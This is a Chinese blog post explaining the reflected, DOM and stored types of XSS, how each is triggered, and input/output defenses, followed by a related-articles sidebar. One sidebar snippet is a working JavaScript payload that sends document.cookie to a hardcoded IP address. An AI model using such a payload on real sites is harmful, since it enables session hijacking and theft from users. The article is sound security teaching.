XSS漏洞攻防

最新推荐文章于 2024-05-06 17:26:17 发布
最新推荐文章于 2024-05-06 17:26:17 发布
阅读量322 收藏 1
点赞数 1
分类专栏: XSS 文章标签: XSS 跨站脚本攻击 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44840696/article/details/90049278
版权

1.什么是XSS漏洞

其实从逻辑上讲,XSS和其他的漏洞诸如SQL注入、文件上传漏洞有很类似的地方:它们都可以通过一些特定的手段,将攻击的代码成功的传送到我们想要攻击的地方。那么有两个关键的环节:
1.代码的注入,即通过什么办法把攻击代码“送”到目的地。
2.代码本身的内容,直接决定着代码进行什么样的攻击,达到什么样的目的,决定着攻击的“威力”。

XSS就是一段由Javascript编写的攻击代码,这个代码能够实现多种攻击功能,对应着XSS的危害,这里我们先不说代码本身的问题,那么XSS漏洞又是什么,其实就是指的我们可以通过一些办法把代码“送”到攻击地点,那么有几种办法(类型)呢?漏洞又是如何产生的呢?总结一句话,XSS漏洞就是通过一些手段在网页嵌入客户端脚本代码,最终在浏览器上执行的客户端攻击。

2.XSS漏洞的类型和触发方式

XSS漏洞分为:反射型、DOM型和存储型。
(1)反射型是通过在URL中做手脚来攻击的,比如我们在一段URL中直接插入JS攻击代码,如果前端和后端都没有识别出URL中有XSS代码,这段代码的“旅程”就是:1.随着URL被提交 2.服务器接收后直接返回带有该代码的数据 3.浏览器解析执行
为什么叫反射型?只是因为服务器相当于进行了一个“吞吐”的过程,类似于反射的过程,但是有一点很关键:代码必须经过浏览器“吞吐”这一次之后才会出现在返回给浏览器的数据中,这样代码才能被执行,否则代码还是在URL中式没办法被解析执行的。
(2)DOM型和反射型不同,它不需要与服务器进行交互,没有经过服务器“吞吐”的过程,因为它的代码利用的是HTML中DOM的一些方法来输出的,比如document.write方法、innerHTML属性等,直接把代码导出到DOM元素中执行的,它的触发是在浏览器解析DOM的时候出现的。
(3)存储型,存储型就厉害了,它是把代码直接传到服务器中,那么上传代码的那个网页就会含有这段代码,它的攻击仍然发生在客户端,每次点击页面服务器就会向客户端发送XSS代码让浏览器执行。这时候服务器的被感染页面就成了攻击源。

那么这三种攻击是怎么触发的?

  • 反射型是从URL中携带代码的,被服务器解析后返回给客户端从而触发,那么最关键的就是“携带”这个过程了,我们可以直接把攻击代码写在URL中,怎么让它触发呢?想办法让用户点啊,比如伪装(欺骗),把URL包装成一些引起人好奇心的消息、新闻之类的,通过微信群或者好友之间分享,用户点击后就触发了,总之中心就是URL
  • DOM型可能发生在页面跳转的时候被触发,如location.href,location/replace()等,也有可能发生在取值写入页面或者动态执行的时候:如从URL中取参数值写入页面或者动态执行,或者从cookie中取参数值写入页面或者动态执行。
  • 存储型的触发就更容易了,只要代码被存到服务器端,点击页面就会立刻执行。

3.XSS的防御措施:

反射型可以通过对URL的参数进行过滤和检查来防御,对预定义字符进行检查,利用转义函数、过滤函数等对URL参数进行检查,对输出进行实体编码,严格控制输出,从输入和输出两方面把关。DOM型可以过滤关键字,对敏感关键字进行过滤,并且innerHTML=encodeHTML([输出]);存储型根据场景的不同,进行对应的输入检查和过滤,如留言板,对留言内容进行敏感字符、关键字的检查和过滤,对输出的内容进行实体编码。
总结一下三种XSS的防御思路是相通的,都是把握好输入检查和输出检查两个方面,只不过应用的具体场景不同,可以把XSS防御的思路总结为:
1.对输入进行严格检查,过滤敏感字符和关键字。
2.使用白名单,提高防护等级,非白名单直接忽略。
3.对输出进行实体编码。
4.使用HTTPonly组织客户端访问cookie,保护cookie不被XSS窃取。

BUAA小细腿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web的基本漏洞--XSS漏洞
尽欢的博客
05-31 3260
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
XSS漏洞原理详解丨小白WEB安全入门
jennycisp的博客
06-27 1876
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。
XSSXSS漏洞详细指南
最新发布
大河之犬的博客
05-06 1057
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者通过在网页上注入恶意脚本代码,从而在用户的浏览器上执行恶意操作。这些脚本可以是 JavaScript、HTML 或其他网页脚本语言。一旦用户在受感染的网页上进行交互,如点击链接或填写表单,恶意脚本就会在用户浏览器上执行,从而导致多种安全问题,包括但不限于:XSS 漏洞通常出现在没有充分验证用户输入的地方,比如网站的搜索框、评论区、表单提交等。预防 XSS 攻击的方法包括对用户输入进行严格过滤和转义,使用安全的开发
XSS漏洞
niqiu320的博客
04-22 923
xss漏洞介绍和分类 什么是XSSXSS(Cross SiteScripting)跨站脚本,较合适的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSxss分类: 反射型(非持久型): 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久性): payload被存储到数据库
XSS学习
m0_50830480的博客
09-03 227
XSS漏洞 一、XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. 二、xss 分类:
逻辑漏洞总结
weixin_46022050的博客
03-02 934
借鉴文章:https://www.freebuf.com/articles/web/225770.html 1、前台模块 1、短信轰炸 参数修改短信轰炸,可以直接修改手机号或者其他参数 Cookie短信轰炸 根据业务的判断 2、手机号遍历枚举 绕过风控继续遍历 简单遍历结 绕过风控方法:修改下面参数,让其构成一个正常参数从而实现绕过 3、绕过验证 删除参数,删除验证码参数导致验证码被绕...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
PHP常见安全漏洞攻防研究.pdf
01-05
"PHP常见安全漏洞攻防研究" PHP 是一种广泛使用的服务器端脚本语言,拥有强大功能和灵活的语法,使得 Web 开发者能够快速开发包含动态页面的 Web 应用程序。然而,由于 PHP 对开发人员要求很低和开发人员的疏忽,...
计算机安全XSS 实际攻击举例
11-03
计算机安全XSS 实际攻击举例 计算机安全是计算机系统和网络的安全保护,避免未经授权...计算机安全XSS实际攻击举例是计算机安全攻防技术中的重要组成部分,使用Burp Scanner可以检测XSS漏洞,并手动测试反射XSS漏洞
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
5. XSS构造及漏洞利用: 攻击者通常会寻找网站的输入点,如搜索框、表单、URL参数等,尝试注入JavaScript代码。一旦找到漏洞,就可以构造特定的请求来触发XSS。 6. 如何防御XSS: - 输入过滤:对用户输入进行严格...
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
XSS漏洞原理与防护措施
qq_50905066的博客
03-27 9329
xss漏洞,既跨站脚本攻击 xss分类: 大致可以分为储存型与反射型。 储存型:最直接的危害类型,跨站代码存储在服务器(数据库)。 反射型:反射型跨站脚本漏洞,最普遍的类型。用户访问服务器-跨站链接-返回跨站代码。 如图 图中所示位储存型xss攻击流程。攻击者要先搭建起恶意服务器。构建xss恶意脚本,通过留言,评论,注册等各种正常服务器可以上传的位置上传恶意脚本。 服务器会将恶意脚本保存在数据库中,当正常用户访问服务器并查看了该恶意脚本时,服务器会将xss的恶意脚本返回至用户浏览器。 这时用
信息安全二 XSS攻击
小灰的博客
02-28 929
一、概述 ​ XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。一般XSS可以分为如下几种常见类型: ​ 1.反射性XSS; ​ 2.存储型XSS; ​ 3.DOM型XSS; 二、环境 靶场:Pikachu 浏览器:火狐 三、反射型 交互的数据一般不会被存放在数据库里,一次性,所见即所得,一般出现在查询类页面等。 1.首先输入一些特殊字符
浅谈 XSS 与 CSRF 攻防
Web分享
01-06 745
简介 XSS(Cross-site scripting)跨站脚本攻击,为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 原理 用户的输入内容被当作程序在网页执行。 危害 偷取用户的密码和登录态 破坏页面结构 重定向到其它网站 XSS攻击分类 反射型(Reflected) url参数直接注入
xss攻防浅谈
weixin_34356310的博客
07-23 144
2019独角兽企业重金招聘Python工程师标准>>> ...
XSS漏洞解决方案之一:过滤器
javaACMer的专栏
09-10 4647
XSS漏洞解决方案之一:过滤器
xss发送请求
3569
11-06 683
var img=document.createElement("img"); img.src="http://172.16.5.110:64321/?cao="+escape(document.cookie); document.body.appendChild(img);
常见的Web漏洞——XSS
江左盟的博客
07-08 2万+
目录 XSS简介 XSS原理及分类 反射型XSS 存储型XSS 基于DOM的XSS XSSer的使用 至少有一个的参数: 可选的参数: 检查选项 选择攻击向量 绕过防火墙选项 绕过器选项 特殊技术 最后注入选项 特殊最后注入选项 报告导出 XSSer演示 BeEF-XSS 漏洞的防范 总结 XSS简介 XSS跨站脚本攻击(Cross Site Scri...
XSS 漏洞总结
4ct10n
11-03 1万+
xss一直以来接触最少的类型,现在终于有幸将其总结一下了·····,xss漏洞是目前最为常见的漏洞类型之一,其触发脚本经常与js代码有关,所以要想掌握好xss必须要有深厚的js编码功底。本篇内容是我学习xss的总结,会结合着代码编写与实验,对xss进行系统的讲解,以便我更好的认识xss
web漏洞解析与攻防实战电子版
07-16
### 回答1: 《Web漏洞解析与攻防实战》是一本介绍Web安全的书籍,通过深入分析和解读常见的Web漏洞,帮助读者更好地理解和防范Web应用程序的攻击。 在该书的电子版中,作者首先介绍了Web应用程序的基本原理和相关技术,包括HTTP协议、HTML、CSS、JavaScript等。之后,逐一分析了Web安全的重要性和流程,引导读者了解Web漏洞的各种类型和危害。 该书的重点之一是对常见的Web漏洞进行深入解析。其中,SQL注入、跨站脚本攻击XSS)、跨站请求伪造(CSRF)、文件包含、文件上传漏洞等被详细讲解,涵盖了漏洞的原理、攻击方式以及防御方法等。书中通过实例和案例,帮助读者更直观地理解和应用这些知识。 此外,该书还提供了一些攻防实战的案例,分析了一些真实的Web应用程序漏洞和攻击事件,引导读者进行实践和测试。通过这些实战经验,读者可以更好地理解Web漏洞的实际应用及其对系统和用户的威胁。 值得一提的是,电子版的优势在于可以随时随地进行学习和查询,书中内容可以通过电子设备进行搜索和标注。此外,电子版还可以与其他工具和资源进行链接,方便读者深入学习和提高技能。 总的来说,《Web漏洞解析与攻防实战》是一本对于Web安全感兴趣或者从事相关工作的人士非常有价值的书籍。它通过系统的讲解和实战提升读者的技能和知识水平,并帮助他们更好地保护Web应用程序的安全。 ### 回答2: 《Web漏洞解析与攻防实战》是一本关于Web安全的电子书,本书旨在帮助读者深入了解Web漏洞攻防实战的相关知识。 首先,本书详细介绍了Web应用程序的基本架构和工作原理,让读者对Web应用程序有一个整体的认识。随后,书中重点解析了常见的Web漏洞类型,如跨站脚本攻击XSS)、跨站请求伪造(CSRF)、SQL注入、文件上传漏洞等。对于每种漏洞,书中都给出了详细的解释和示例代码,帮助读者理解漏洞的原理和利用方式。 为了帮助读者更好地理解漏洞的攻击和防御方法,本书还提供了大量的实战案例。这些案例涵盖了不同类型的漏洞,通过具体的场景和示例代码,引导读者进行漏洞的发现和修复。同时,书中还介绍了一些常用的漏洞扫描工具和漏洞修复技巧,帮助读者提高Web应用程序的安全性。 此外,本书还强调了Web安全的思维方式和方法论。作者提供了一些实用的安全设计原则和开发规范,让读者在Web应用程序的设计和开发过程中就能考虑安全问题,减少漏洞的产生。同时,书中还介绍了一些常见的安全防护策略,如输入验证、输出编码、会话管理等,帮助读者建立起一套完善的Web安全体系。 综上所述,《Web漏洞解析与攻防实战》是一本全面介绍Web漏洞攻防实战的电子书。通过学习本书,读者可以提高自己对Web安全的认识和理解,掌握常见Web漏洞的检测和修复技术,构建安全可靠的Web应用程序。这对于所有从事Web开发和安全工作的技术人员来说都是一本不可多得的学习资料。 ### 回答3: 《Web漏洞解析与攻防实战》是一本关于网络安全的书籍,主要讲解了Web应用程序中常见的漏洞类型以及相应的解析和防御方法。这本书适合对网络安全有一定基础和兴趣的读者阅读。 书中首先介绍了Web应用程序中的一些常见漏洞类型,例如跨站脚本攻击XSS)、SQL注入、跨站请求伪造(CSRF)、文件上传漏洞等。对于每种漏洞类型,书中详细解析了其原理和攻击方式,并给出了相应的实例和代码分析。读者通过学习这些漏洞原理和攻击方式,可以更好地理解Web应用程序中潜在的安全风险。 接着,书中介绍了如何进行Web漏洞的防御。通过学习这些防御方法,读者可以了解如何通过编码规范、安全策略和安全工具等手段来提高Web应用程序的安全性。书中详细解析了一些常用的防御措施,例如输入验证、参数化查询、安全的会话管理等,读者可以根据自己的需要和实际情况来选择适合的防御方法。 此外,书中还介绍了一些实战场景,让读者能够将所学的知识应用到实际的漏洞攻防场景中。通过这些实战案例,读者可以更深入地理解漏洞的利用和防御过程,加深对网络安全的理解和实践能力。 总之,《Web漏洞解析与攻防实战》是一本综合性的网络安全书籍,涵盖了常见的Web漏洞类型、攻击技术和防御措施。通过阅读这本书,读者可以提高自己对Web应用程序安全的认识和技能,从而更好地保护自己的网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值